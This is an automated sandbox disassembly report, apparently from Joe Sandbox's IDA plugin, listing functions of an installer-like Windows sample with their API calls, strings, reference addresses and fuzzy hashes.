Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: inetutil.cpp
API String ID: 1528435940-2900720265
Opcode ID: 013a32cfda035a874fc47a26088eaab5e29df00dc0b8452ae1ddf23d8993ec45
Instruction ID: 37a4da363cdb95cdaa989d0c41478c8bb1849cb7e0fa6b51ffd95ce0414ce383
Opcode Fuzzy Hash: 013a32cfda035a874fc47a26088eaab5e29df00dc0b8452ae1ddf23d8993ec45
Instruction Fuzzy Hash: 70119677A0113AA7D720ABA98D45FBFBFA8AF44750F010515AE45F7240EA249D0496E2

Function 004D3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,004D3FB5,feclient.dll,?,00000000,?,?,?,004C4B12), ref: 004D3B42

Part of subcall function 005010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0050112B
Part of subcall function 005010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00501163

Strings

feclient.dll, xrefs: 004D3AAB
Logging, xrefs: 004D3AD4
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 004D3AB7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 7eb7d0c0992e09ea831b92f9b04a9fd9e9b448d24a563c0b52e6c2e9cc5220dd
Instruction ID: 38822df6c963f89d744df2af2b38086e6b5bbfc0b75abb621c14210dea6c85e3
Opcode Fuzzy Hash: 7eb7d0c0992e09ea831b92f9b04a9fd9e9b448d24a563c0b52e6c2e9cc5220dd
Instruction Fuzzy Hash: A5118426640208BBDB21DE55DC96EAFBBB8FB50702F400067E50057392D675AF81D615

Function 00500764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(004E12CF,00000000,00000000,?,?,?,00500013,004E12CF,004E12CF,?,00000000,0000FDE9,?,004E12CF,8007139F,Invalid operation for this state.), ref: 00500776
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,00500013,004E12CF,004E12CF,?,00000000,0000FDE9,?,004E12CF,8007139F), ref: 005007B2
GetLastError.KERNEL32(?,?,00500013,004E12CF,004E12CF,?,00000000,0000FDE9,?,004E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005007BC

Strings

logutil.cpp, xrefs: 005007ED

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 1bb79ca48c1980b9718d961b27a0660ebe6b88036a4b1f30687ede6564d56de0
Instruction ID: 11f7f174501adf63a531c5e51f78d9eb758be699dce25be1de0639e9bdf3a3e7
Opcode Fuzzy Hash: 1bb79ca48c1980b9718d961b27a0660ebe6b88036a4b1f30687ede6564d56de0
Instruction Fuzzy Hash: 2D11A772A00135ABD3249A659D85FAFBE68FF55760F110225FD00E72C0E664AD00DAE0

Function 004C120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,004C523F,00000000,?), ref: 004C1248
GetLastError.KERNEL32(?,?,?,004C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 004C1252

Strings

apputil.cpp, xrefs: 004C1273
ignored , xrefs: 004C1217

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: 90ca2bcfd54b35b35dd477f0a54df59d4ee90d8146bc69e4d369141e63a01914
Instruction ID: 5c5a1f53472fcacb3574b986ff20164324bb535f7d9ae493fdbbbc02f971343b
Opcode Fuzzy Hash: 90ca2bcfd54b35b35dd477f0a54df59d4ee90d8146bc69e4d369141e63a01914
Instruction Fuzzy Hash: 2D11D03A900129EBCB20DB99D845E9FBBA8EF01750F01009AFC00F7221E735DE00DAA8

Function 004ED1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,004ED3EE,00000000,00000000,00000000,?), ref: 004ED1C3
ReleaseMutex.KERNEL32(?,?,004ED3EE,00000000,00000000,00000000,?), ref: 004ED24A

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

Strings

Failed to allocate memory for message data, xrefs: 004ED212
NetFxChainer.cpp, xrefs: 004ED208

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: 9230b2b9c88953fd62c4dc9e8ad5127fe239d607eac502ef32f8c4434451dd46
Instruction ID: 24fcda976da0385fc72b500d4f67aa1e4cb6c76f28bead4fec2e5bc79f9b04dc
Opcode Fuzzy Hash: 9230b2b9c88953fd62c4dc9e8ad5127fe239d607eac502ef32f8c4434451dd46
Instruction Fuzzy Hash: C711BFB5200216AFCB159F65E885E6ABBF4FF49724F104169F9149B391C731A810CBE8

Function 004C1F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(004C428F,004C548E,?,00000000,00000000,00000000,?,80070656,?,?,?,004DE75C,00000000,004C548E,00000000,80070656), ref: 004C1F9A
GetLastError.KERNEL32(?,?,?,004DE75C,00000000,004C548E,00000000,80070656,?,?,004D40BF,004C548E,?,80070656,00000001,crypt32.dll), ref: 004C1FA7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,004DE75C,00000000,004C548E,00000000,80070656,?,?,004D40BF,004C548E), ref: 004C1FEE

Strings

strutil.cpp, xrefs: 004C1FCB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 5e75e9ad857253e5f597313b9a14d597d5cf209cabbb2f04496da7fcaaa912ce
Instruction ID: c3a877f7a6a7884de2d69f331e116c15a1d3791b7e3b7a69a5b051c581983eaf
Opcode Fuzzy Hash: 5e75e9ad857253e5f597313b9a14d597d5cf209cabbb2f04496da7fcaaa912ce
Instruction Fuzzy Hash: AB0182BA900129FBEB209F95CC49EDF7AACEB05710F00415ABD00E6250E7748E0096E4

Function 004D0721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 004D0791

Strings

Failed to update resume mode., xrefs: 004D0762
Failed to open registration key., xrefs: 004D0748
Failed to update name and publisher., xrefs: 004D077B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
API String ID: 47109696-1865096027
Opcode ID: e6ae24c585387a6948ce822308a3dc4ea295bf09f1e2f208a3bca91a16ff9ad5
Instruction ID: 309409191bd6e1f934f1e0378f92fd6b5c8c70c89e4c1e1b6ab6c27395688c45
Opcode Fuzzy Hash: e6ae24c585387a6948ce822308a3dc4ea295bf09f1e2f208a3bca91a16ff9ad5
Instruction Fuzzy Hash: F101D836940629F7DB225694DC55FEEBA69AF00B20F100157F500BB290D779BE10ABD8

Function 00504DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(0050B500,40000000,00000001,00000000,00000002,00000080,00000000,004D04BF,00000000,?,004CF4F4,?,00000080,0050B500,00000000), ref: 00504DCB
GetLastError.KERNEL32(?,004CF4F4,?,00000080,0050B500,00000000,?,004D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00504DD8
CloseHandle.KERNEL32(00000000,00000000,?,004CF4F4,?,004CF4F4,?,00000080,0050B500,00000000,?,004D04BF,?,00000094), ref: 00504E2C

Strings

fileutil.cpp, xrefs: 00504DFC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: 1a6858e4a47d079e4cd59ff2a88f50f5bfd1d27006536f45d04ccb50a3d63e56
Instruction ID: 8c7121ddeb353c625d83d30bea46b823149d327f5094d5605a3422bd15fe550f
Opcode Fuzzy Hash: 1a6858e4a47d079e4cd59ff2a88f50f5bfd1d27006536f45d04ccb50a3d63e56
Instruction Fuzzy Hash: B801B173641125A7D6325E699C09F5F3E58BB41B71F014211FF20AA1D0D7718C01AAE2

Function 0050497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,004E8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 005049AE
GetLastError.KERNEL32(?,004E8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 005049BB

Strings

fileutil.cpp, xrefs: 0050498F, 005049DF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: c3963a0e1f5ac11c86a4b348142f1d922d81011efbc7c797d2a6be2c9ac8e4b4
Instruction ID: b19e57f325993885eede83ef7c81a728e106e03d6d9206f1fc7623536823dba7
Opcode Fuzzy Hash: c3963a0e1f5ac11c86a4b348142f1d922d81011efbc7c797d2a6be2c9ac8e4b4
Instruction Fuzzy Hash: 87014973680134B7E3212A956C0EF7F2E58BB00B70F118626FF51BA1C0CB654D00AAE4

Function 004E6BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(004E6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,004E6AFD,00000000), ref: 004E6C13
GetLastError.KERNEL32(?,?,?,?,?,?,004E6AFD,00000000), ref: 004E6C1D

Strings

Failed to stop wusa service., xrefs: 004E6C4B
msuengine.cpp, xrefs: 004E6C41

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuengine.cpp
API String ID: 4114567744-2259829683
Opcode ID: f75745c0738ac613608a3e39b2ab1ac34517b1a3fdf24a3cbb3f2a6ca24b19c7
Instruction ID: 92b8b5546b9f2331fd660d9d8d12c9bd3bac7b2058c13d85521b54fd893495cd
Opcode Fuzzy Hash: f75745c0738ac613608a3e39b2ab1ac34517b1a3fdf24a3cbb3f2a6ca24b19c7
Instruction Fuzzy Hash: 42012073A4123967D730DB669C45BAF7BA4EF58761F11002AFD00BB280DA289D0145E8

Function 00503929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0050396E
SysFreeString.OLEAUT32(00000000), ref: 005039A1

Strings

xmlutil.cpp, xrefs: 0050393F, 00503985
`5w, xrefs: 005039A1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: 9473d25feaae87731e6dd811e2e3b2233cccde0a2beff25a143d6cf258449e70
Instruction ID: a973c341d64c61c7499a19a02f39844a648c97a62a86d6428d6f030671bf7da8
Opcode Fuzzy Hash: 9473d25feaae87731e6dd811e2e3b2233cccde0a2beff25a143d6cf258449e70
Instruction Fuzzy Hash: 74018F35645215ABE7205E999C44F7E3ADCFF51B60F104939FD40A7380C6B4CD0096E5

Function 005039AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005039F4
SysFreeString.OLEAUT32(00000000), ref: 00503A27

Strings

xmlutil.cpp, xrefs: 005039C5, 00503A0B
`5w, xrefs: 00503A27

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: 47af2cdba167f3647f34a15880a11b3266878fecd03550b544622029f0631ec4
Instruction ID: 282740133734e13c01797d83039f8a603a6b815aa9d9e40e5187d2f3cee0242d
Opcode Fuzzy Hash: 47af2cdba167f3647f34a15880a11b3266878fecd03550b544622029f0631ec4
Instruction Fuzzy Hash: B301A235744215B7E7205E99AC49F7F3ADCFF51B64F140929FC44A7380D6B4CE0096A0

Function 005068B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0050690F

Part of subcall function 00508713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00508820
Part of subcall function 00508713: GetLastError.KERNEL32 ref: 0050882A

Strings

`5w, xrefs: 0050690F
clbcatq.dll, xrefs: 005068DC
atomutil.cpp, xrefs: 005068FD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: `5w$atomutil.cpp$clbcatq.dll
API String ID: 211557998-3684314812
Opcode ID: c0ee9ee9842901e42bd986aca8389d6695b206d77b7c9e9f87e0d374346a0a9e
Instruction ID: ea7748c5c72d69d20e2b26546cac86c805a12074092503d4e3940475a085fe1a
Opcode Fuzzy Hash: c0ee9ee9842901e42bd986aca8389d6695b206d77b7c9e9f87e0d374346a0a9e
Instruction Fuzzy Hash: CF018FB190122AFFCB209F85C84586EFFA8FF14365B64857AF504AB550C3716E20E6D0

Function 004DECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 004DECED
GetLastError.KERNEL32 ref: 004DECF7

Strings

Failed to post elevate message., xrefs: 004DED25
EngineForApplication.cpp, xrefs: 004DED1B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 2eb8375943e36371e186c0fa8e360caf0c344c31702655d90b760688eab82e21
Instruction ID: e7b1b80d30f74659e2451cba90c666c5eb4592519c6e8194bdd12032daefa9ab
Opcode Fuzzy Hash: 2eb8375943e36371e186c0fa8e360caf0c344c31702655d90b760688eab82e21
Instruction Fuzzy Hash: 11F0FC376402326BD7306A959C1DB9B7B94BF00B70B21412BFE14AF3C1DB69CC0182D8

Function 004CD8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 004CD903
FreeLibrary.KERNEL32(?,?,004C48D7,00000000,?,?,004C548E,?,?), ref: 004CD912
GetLastError.KERNEL32(?,004C48D7,00000000,?,?,004C548E,?,?), ref: 004CD91C

Strings

BootstrapperApplicationDestroy, xrefs: 004CD8FB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: 35a1aa57ff57e912c0c29fa1edb1e65ead4320aad538119fad507ab243e04ad5
Instruction ID: 5893a6b3f9140f403f15a0b33e546bb23ee5bcfe414ee841664c16b4e342e0e8
Opcode Fuzzy Hash: 35a1aa57ff57e912c0c29fa1edb1e65ead4320aad538119fad507ab243e04ad5
Instruction Fuzzy Hash: 47F04476A00626ABD3145F65D808F2BF7A4BF14762701823AA825D6620D775EC509BD4

Function 00503D80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,fTL,?,00000000,004C5466,?,?,?), ref: 00503DA7
CoCreateInstance.OLE32(00000000,00000000,00000001,0052716C,?), ref: 00503DBF

Strings

Microsoft.Update.AutoUpdate, xrefs: 00503DA2
fTL, xrefs: 00503D97, 00503D9E, 00503DA1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate$fTL
API String ID: 2151042543-1242459678
Opcode ID: ec601d23b0350c449ae342c2c00da2d40cae77012686e0246be8d72815cf6642
Instruction ID: 8e4d7bd92c0c4dd642e3f7115eb141662b82b6e58e8a38a97e67e0a0a24d0589
Opcode Fuzzy Hash: ec601d23b0350c449ae342c2c00da2d40cae77012686e0246be8d72815cf6642
Instruction Fuzzy Hash: EDF0B431600118BBE700DFA9ED45AEFBBBCEF09700F100425EA01E7190D671AE0487A2

Function 005031EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00503200
SysFreeString.OLEAUT32(00000000), ref: 00503230

Strings

xmlutil.cpp, xrefs: 00503214
`5w, xrefs: 00503230

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: eb0692a5c5a91612ca43b0713dc88c3218e7d851de1fee8c13252662fdca55e3
Instruction ID: 861528da1ddac0d83f60e53ca7ae16a2cccd81bd03ae80bdddd93dd95a2fc497
Opcode Fuzzy Hash: eb0692a5c5a91612ca43b0713dc88c3218e7d851de1fee8c13252662fdca55e3
Instruction Fuzzy Hash: 9BF0BE39102666A7C7315F84AC48FAF7BACFF80B60F248529FC046B290C7758E1096E0

Function 00503498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005034AD
SysFreeString.OLEAUT32(00000000), ref: 005034DD

Strings

xmlutil.cpp, xrefs: 005034C4
`5w, xrefs: 005034DD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
